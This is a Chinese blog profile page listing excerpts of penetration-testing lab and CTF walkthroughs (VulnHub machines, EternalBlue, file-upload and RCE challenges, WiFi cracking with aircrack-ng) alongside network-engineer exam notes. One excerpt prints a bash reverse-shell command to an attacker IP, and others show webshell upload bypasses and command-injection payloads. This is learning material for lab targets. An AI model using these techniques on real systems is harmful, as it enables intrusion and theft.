自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(57)
  • 收藏
  • 关注

原创 vulnhub-The Planets: Earth

The Planets: Earth ~ VulnHub靶机:The Planets: Earth ~ VulnHub攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集nmap 192.168.1.1/24开放了22 80 443 继续探测端口详细信息。又看到了python环境,那基本上就 CVE-2021-4034一打就死。然后注意看这两个dns记录。访问一下80和

2022-06-09 14:10:50 419 1

原创 vulnhub-The Planets: Mercury

The Planets: Mercury ~ VulnHub靶机:攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap 192.168.1.1/24进一步探测端口信息nmap -sS -sV -A -p- 192.168.1.114访问一下8080端口,说是你好此网站目前正在开发中,请稍后再查看。随便访问一下错误页面。 给了三个提示。indexrobots.t

2022-06-02 16:46:07 825 1

原创 软考-中级-网络工程师-知识点个人总结(九)

1、CPU部件:运算器、控制器、寄存器。运算器:算术逻辑运算器、累加器、数据缓冲寄存器、状态条件寄存器。控制器:程序计数器、指令寄存器、指令译码器、时序部件。2、a测试依据测试类型 测试内容 测试依据 黑盒测试(功能测试) 对软件的每个功能进行测试,测试时完全不用考虑程序的内部结构和程序的内部特征。在程序接口进行测试。 软件的需求说明 白盒测试 对软件的过程细节进行测试,测试时可利用程序内部逻辑结构和有关信息设置,或选择测试用例,可不考虑程...

2022-05-20 16:47:37 1147

原创 软考-中级-网络工程师-知识点个人总结(八)

十三、无线网络与存储技术1、扩频技术:使用伪随机序列对代表数据的模拟信号进行调制。对无线噪声不敏感,产生的干扰小,安全性比较高,但是占用带宽较高。通过增加带宽来提高信噪比和等速率的情况下数据传输的可靠性。2、IEEE 802.11定义的无线局域网络的两种工作模式:基础设施网络和自主网络,基础网络:预先建立起来的具有一定地理覆盖能力的一系列固定基站。自主网络:不需要固定的基础设施,仅靠自身就可以构建网络。是一种不需要有线网络和接入点支持的点对点网络。3、标准IEEE802.11n标准可提供

2022-05-20 09:43:54 1071

原创 软考-中级-网络工程师-2021年下半年-上午真题整理

1、程序计数器不属于CPU运算器组成部件。2、Python 是一种解释型语言,所以开发过程中是没有编译这个过程的。3、白盒测试无法发现软件的功能错误。4、服务于大众的云,称为公有云。4、外包合同中的关键核心文件是服务等级协议(SLA)。5、数据标准化的三个阶段:业务建模、数据规范化、文档规范化。6、软件开发过程中、系统测试阶段的测试目标来自于需求分析。7、《中华人民共和国著作权法》和《计算机软件保护条例》是构成我国保护计算机软件著作的两个基本法律文件。8、光纤中继器可使光信号

2022-05-17 16:09:56 4247

原创 软考-中级-网络工程师-知识点个人总结(七)

15、配置FTP服务器时,默认情况下“本地路径”为c:\inetpub\ftproot。16、IIS身份认证:(1)匿名身份认证:用于匿名用户访问web时的身份认证。不要求验证身份。无安全防护能力。(2)基本身份认证:限制对NTFS格式的web服务器访问,该认证方式基于 用户ID。其中用户ID、密码均为明文,使用的事base64编码,安全防护能力低。(3)摘要式身份认证:需要用户ID和密码。用户凭据作为hash md5进行传输,可通过代理客户端也需要使用活动目录。安全防护能力中。(4)集成

2022-05-13 22:46:50 1136

原创 vulnhub-Corrosion: 2

Corrosion: 2 ~ VulnHub靶机:Corrosion: 2 ~ VulnHub攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap -sS -sV -A -p- 192.168.1.108主机开放了三个端口。访问一下80和8080分别是Apache和Tomcat中间件的界面。没啥发现,开始目.

2022-05-12 14:41:36 480

原创 软考-中级-网络工程师-知识点个人总结(六)

十一、Windows 服务配置。1、Windows server 2008中,活动目录必须安装在NTFS中,并且需要有dns服务的支持。2、Windows系统中,guest权限最低,administrator权限最高。3、Windows密码复杂度策略:(1)不得包含账户名和用户全名的一部分。(2)长度至少为六个字符。(3)包含来自一下四个类别中的三个:英文大写字母(A~Z);英文小写字母(a~z);10个基本数字(0~9);非字母字符(特殊符号);4、账号锁定策略:

2022-05-11 22:03:23 1001

原创 软考-中级-网络工程师-知识点个人总结(五)

19、常见隧道协议及其所在协议层次:数据链路层:L2TP、PPTP、L2F。网络层:IPSec。传输层:SSL。20、IPSec协议体系:(1)IKE协议:密钥交换协议,属于一种混合型协议,IKE定义的密钥交换方式有手动密钥交换和自动IKE。(2)AH:认证头,为IP数据段提供完整性检查和数据源认证。并防止重放攻击。AH不支持数据加密,AH常见的摘要算法MD5(单向hash函数)和SHA1实现摘要、认证确保数据完整。(3)ESP:封装安全载荷,可以同时提供数据完整性确认、数据加密

2022-05-10 21:31:54 1484

原创 vulnhub-Corrosion: 1

Corrosion: 1 ~ VulnHub靶机:攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap 192.168.1.1/24由于这个靶机没有给出ip地址,这里需要自己扫描,这里根据他开放的22和80端口判断,192.168.1.102这台机是靶机。因为我这就这么几台电脑。继续扫描nmap -sS -s..

2022-05-10 15:48:04 646

原创 BUUCTF-[GXYCTF2019]BabyUpload

直接开题。上来就是一个文件上传。这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。所以这里想到了之前用过了.htaccess。传入.htaccess,格式修改为image/jpeg。上传成功,传入php探针进行测试,这里推荐直接上phtml格式的马子。传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个:http://84247058-8c5c-496d-b573-d01266658f00.node4.b...

2022-05-06 16:53:26 1148

原创 软考-中级-网络工程师-知识点个人总结(四)

十、网络安全1、常见的对称加密算法DES、3DES、RC5、IDEA。DES:明文分为64位一组,密钥是64位,实际位是56位密钥和8位奇偶校验。3DES:3DES是DES的拓展,是执行了三次的DES。第一和第二次加密使用同一密钥的方式,密钥长度扩展到128位,第三次加密使用不同的密钥,密钥长度扩展到192位。(168位有效)RC5:分组大小、密钥长度、加密算法三个参数可变的分组密码算法。IDEA:明文、密文均为64位,密钥长度为128位。RC4:常用密码流,密钥长度可变,用于SSL

2022-05-05 16:35:49 1268 1

原创 vulnhub-Empire: LupinOne

Empire: LupinOne ~ VulnHub靶机:EMPIRE: LUPINONE攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。map -sS -sV -A -p- 192.168.1.109目标网站:22/80端口r.

2022-05-05 14:50:47 2135 10

原创 软考-中级-网络工程师-知识点个人总结(三)

3、ARP协议:根据IP求MAC地址,协议单元被封装在以太帧中,采用广播方式发送。RARP协议:根据MAC协议求主机对应的IP地址。4、IPV6出现的目的是解决全球IP地址短缺的问题。地址长度为128位,写8组,没组为4个16进制。5、IPV6分为三类:单播、组播、任意波。回环地址为:0:0:0:0:0:0:0:1。六、传输层1、传输层主要协议:TCP、UDP。2、udp协议在ip层之上提供端口的寻址能力。无连接不可靠,不具备连接管理、差错校验和重传、流控等功能。不需要使用顺序号。3

2022-05-02 16:42:52 5196 1

原创 vulnhub-EMPIRE: BREAKOUT

Empire: Breakout ~ VulnHub靶机:EMPIRE: BREAKOUT攻击机:kali linuxLinux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集nmap 192.168.1.1/24nmap -sS -sV -A -p- 192.168.1.107访问一下80端口在页面源码的最底部发...

2022-05-01 16:51:46 738

原创 软考-中级-网络工程师-知识点个人总结(二)

一、计算机硬件。(27)回归测试:白盒测试,黑盒测试。白盒测试:结构测试、逻辑驱动测试。黑盒测试:功能测试,数据驱动测试。(28)常见的软件开发模型:瀑布模型,原型模型、V-模型。(29)瀑布模型:主要用于功能定义清晰,时间要求严格的项目。(30)程序的三种基本控制结构是:顺序、选择、循环结构。(31)移码的特点:移码的最高位为0表示负数,最高位为1表示正数,与原码、补码、反码的符号位取值正好相反。移码为全0时对应的真值最小、全1时对应的真值最大。真值0的移码表示的是唯一

2022-05-01 11:59:11 2394

原创 软考-中级-网络工程师-知识点个人总结(一)

一、计算机硬件。(1)处理机主要由处理器、存储器、总线组成。总线包括:数据总线、地址总线、控制总线。(2)指令的操作信号由CPU产生,并由CPU运送到相应的部件。(3)pc程序计数器(指令计数器),属于专用寄存器,主要用于计数和存储信息。(4)CPU指令集:CISC、RISC。(5)CISC复杂指令集,程序的各条指令及指令中的操作都是按顺序执行。优点:控制简单。缺点:对计算机各部分利用率低,执行速度慢。(6)RISC精简指令集:是在CISC的基础上发展来的,精简了指令系统,采用了

2022-04-30 17:02:45 3628

原创 vulnhub-HACKABLE: Hackable: III

Hackable: III攻击机:kali linuxLinux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux靶机:Hackable: III信息收集:NMAP探测端口信息:nmap 192.168.1.1/24nmap探测详细端口信息:nmap -sS -sV -A -p- 192.168.1.103探测到了robots.txt。..

2022-04-29 15:00:25 470

原创 永恒之蓝(MS17-010)漏洞复现

攻击机:win10靶机:win7一:信息收集阶段nmap:nmap -sS -sV -A -p- 192.168.1.107看到目标主机时win7系统,并开启了445端口。存在被攻击的可能。二、攻击准备阶段。MSF(win版)(1)查看可利用漏洞exp信息。search ms17-010(2)探测漏洞可否被利用。这里选择scanner,对目标主机进行扫描。执行命令:use 3 或者use auxiliary/scanner/smb/smb_ms1.

2022-04-28 11:32:06 1685

原创 vulnhub-HACKABLE: II

攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux靶机:

2022-04-22 11:29:00 3225

原创 BUUCTF-[网鼎杯 2018]Fakebook

打开题目点击login,一个登陆界面。没啥发现。点击join。注册一个账号看看。这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。测试出来字段为4,开始尝试获取数据库信息。貌似有waf,尝试使用/**/绕过。成功绕过,并且发现注入点...

2022-04-20 16:42:13 1691

原创 CTFHub技能书解题笔记-SSRF-SSRF

打开题目,提示我们尝试访问位于127.0.0.1的flag.php吧。那就是flag再127.0.0.1这个ip的目录下。会不会是XFF?访问链接发现主页为空,抓包看看, 然后添加XFF。貌似毫无反应。再仔细看链接后缀是?url=_。会不会是在后面接上127.0.0.1/flag.php呢。试试拿到flag。...

2022-04-07 10:08:39 2168

原创 CTFHub技能书解题笔记-RCE-综合过滤练习

直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢?估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。这里我们慢慢绕过吧。一层层过。首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。进行利用,发现;可以通过%0a代替ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资...

2022-04-06 14:29:20 2931

原创 CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符、过滤运算符

一、过滤空格过滤了空格。引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等直接开始解题这里就用<来绕过。flag还是再界面源码。二、过滤目录分隔符题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx

2022-04-01 10:00:44 3568

原创 CTFHub技能书解题笔记-RCE-过滤cat

打开题目,提示我们过滤了cat命令,也就是不能用cat来读取flag的值。这里的话我就去查了linux读取文件的命令。 cat 从第一行开始显示文本内容(适用于内容较少的) Tac 从最后一行开始显示,是 cat 的逆顺序 More 一页一页的显示文本内容(适用于内容较多的) less 与 more 类似,但是比 more 更好的是,它可以..

2022-04-01 09:26:10 2663

原创 无线网卡+kali实现wifi暴力破解(密码爆破方式)

攻击机:kali所采用的的无线网卡:D-LINK采用的工具:Aircrack-ng测试开始:首先,打开kali,将无线网卡插入。弹出提示窗口,这里选择连接到虚拟机,选择kali虚拟机。然后点击网络连接的标志,可以看到当前环境的wifi列表。使用命令ifconfig和iwconfig,都可以看到wlan0已开启。现在开始爆破。这里的字典是我自己常用的,大家可以自行寻找字典。(1)清除进程:airmon-ng check kall(2)开启监听

2022-03-31 15:07:52 17156 6

原创 CTFHub技能书解题笔记-RCE-命令注入

打开题目是命令注入,题目要求是这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag。竟然是没有任何安全措施的。那就开整了。打开题目是源代码,这个和dvwa上的命令注入就是一样的。那没啥好说的直接开测了。ping 114.114.114.114.拼接命令ping 114.114.114.114;ls找flag。ls了半天,最后再第一步的247711895227.php 的界面源码里找到了这道题没做任何难度,没有难度。...

2022-03-31 09:28:05 1076

原创 CTFHub技能书解题笔记-RCE-读取源代码

打开题目,读取源代码。直接开整。题目界面就是源代码。和上一道一样,但是代码有所变化。if ( substr($_GET["file"], 0, 6) === "php://" ) #返回file里面第0个到第6个字符,且要等于 php:// 。那既然要等于php://,就和上题一样,试试php://input芜湖了,好像没用。这里的input是不起作用,看大佬说是allow_url_fopen没有开启。题目要求又必须使用php://。而且flag就在/flag里。这里引...

2022-03-30 15:10:44 1471

原创 CTFHub技能书解题笔记-RCE-远程包含

直接开题:打开题目就是源代码。这里进行简单分析:这里还说了。我没有shell。源码这里使用的提到了file。既然是远程文件包含,那我们尝试使用file包含phpinfo看样子能行他说没有shell,那我们利用远程文件包含漏洞结合php伪协议自己传入一个。这里提供利用样例截图。开始进行测试:传入phpinfo成功运行PHPinfo。路线是对的,那就直接命令执行了。拿到flag,本题结束。重点...

2022-03-29 15:08:37 1272 3

原创 vulnhub-Billu_b0x(getshell成功)

这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟上面一篇文章开始。开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...

2022-03-29 14:39:15 1664

原创 vulnhub-Billu_b0x

题目:Billu_b0x攻击机:kali-linuxip地址:靶机:vulnhub-Billu_b0x开始解题:一、信息收集:nmap获取目标主机信息:这一步主要获取目标主机的端口信息等,先对整段进行扫描。这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。nmap -sS -sV -A -p- 192.168.1.103出

2022-03-27 16:33:51 787

原创 CTFHub技能书解题笔记-RCE-php://input

打开题目很熟悉的源代码界面。简单的审计一下。这里提到了php://然后if这段代码的意思是file里的前六个字符必须要等于php://(===表示强制等于)这里回到题目,题目是php://input ,这里引入知识点:php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data大家..

2022-02-23 10:58:16 1491

原创 CTFHub技能书解题笔记-RCE-文件包含

打开题目。他需要一个shell.txt文件。这里尝试点击shell访问一下看到了一句话。这里我们直接再/shell.txt 后面进行post传参是没用的。要进行文件包含,这里我们要将shell.txt进行构造。所以要用到?file=shell.txt。再进行post传参,成功传参, 成功拿到flag...

2022-01-28 11:05:20 3358

原创 CTFHub技能书解题笔记-RCE-eval执行

打开题目直接就是源码。 意思是传参cmd,然后直接就执行cmd,不做任何过滤。然后我们直接传入命令,进行测试?cmd=system("ls");这里直接查询了当前目录。但是没有flag,我们尝试返回上一层。/在这里做返回上一层,可叠加使用,/../../。看到了flag_17023。直接查看一下,这里没做过滤,我们直接运行?cmd=system("cat /flag_17023")就拿到了flag,这一道就是非常简答单的rce远程命令代码执行漏

2022-01-27 14:25:52 2599

原创 BUUCTF-[极客大挑战 2019]BuyFlag

打开题目。好像没啥,右上角发现个菜单按钮,点开看看。看到中间写了。flag需要100000000money。然后attention这里写着,如果你需要FLAG,你必须是一名叫cuit的学生,你必须正确回答password。然后继续查看源码,发现了这一段代码。让我们post money和password。然后password不能为数字,然后password必须等于404才返回正确,那这里我们可以通过弱类型来找过,就是404后面加上字母。抓包看..

2022-01-20 10:05:14 2683 1

原创 CTFHub技能书解题笔记-文件上传-双写后缀

打开题目 双写后缀绕过,这里适用于前后端都对文件的扩展名做了限制。我们可以通过双写文件的扩展名,达到绕过的目的。例如:xxx.php=>xxx.pphphp.开始解题。直接打开burpsuit进行抓包,上传马子。然后双写文件后缀。成功上传并执行。拿到flag。这里漏洞的原理就是,文件后缀名过滤的时候.pphphp。他会把中间的php当做危险用户名过滤为空,所以首字母的p和尾部的hp会再次组合为php,再进行执行的时候,我们这里仍...

2022-01-13 14:37:00 920

原创 CTFHub技能书解题笔记-文件上传-00截断

打开题目提示我们了解一下,php 5.2 00截断,查一下相关资料吧。截断原理:http://www.xxx.com/xx.jpghttp://www.xxx.com/xx.php%00.jpg => http://www.xxx.com/xx.php这里粗浅的说明一下本题所用到的原理,就是在.php文件后加上%00后接.jpg,这里我们就可以绕过对php文件的过滤。在执行时,%00会把后面的.jpg截断,所以执行的时候他执行的仍然是前面的.php文件。就可以实现我们的马子文件

2022-01-12 10:51:15 1983

原创 CTFHub技能书解题笔记-文件上传-文件头检查

打开题目到这里看起来没啥异样,上传个马子试试。看起来过滤了一些东西啊。这里继续上传马子看来也检测内容了。只允许上传图片格式,那做个图片马试试。这里图片马的指令:win:copy xxx.jpg/b + xxx.php 图片马.php/b 表示以二进制方式打开 /a 表示以ASCII方式打这里我生成的事php的马子,是因为本道题死一到后端过滤的。后端过滤我们需要把文件格式也改为JPG之类的。成功上传完毕shell连接成功。...

2022-01-07 16:17:29 991

原创 CTFHub技能书解题笔记-文件上传-MIME绕过

打开题目MIME绕过,先查查什么是MIME吧。MIME:当文件的扩展名是用一种应用程序来打开的方式类型,当扩展名文件被访问的时候,浏览器会自动指定应用程序来打开。有点绕口,通俗点就是,当我们上传的文件被判定为content-type字段时,可以通过抓包,将content-type字段改为常见的图片类型,例如inamge/gif,从而绕过。也就是我们上传php文件时,可以改为jpg、png之类的,然后实现绕过。开始测试。先正常测试下。发现确实不能上传..

2022-01-06 15:15:43 1301

原创 CTFHub技能书解题笔记-文件上传-.htaccess

打开题目这里好好看看题干,信息量蛮多的,索性查查.htaccess。内容蛮多的,这里我就概括一下这道题用到的重点。htaccess文件是Apache服务器中的一个配置文件,可以帮我们实现:改变文件扩展名。然后,先构造一个.htaccess文件。文件内容是将文件扩展名改为PHP。方便我们执行马子。附上文件内容:SetHandler application/x-httpd-php打开链接上传.htaccess文件。然后上传.JPG格式的php马子。其.

2022-01-05 14:13:16 1060

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除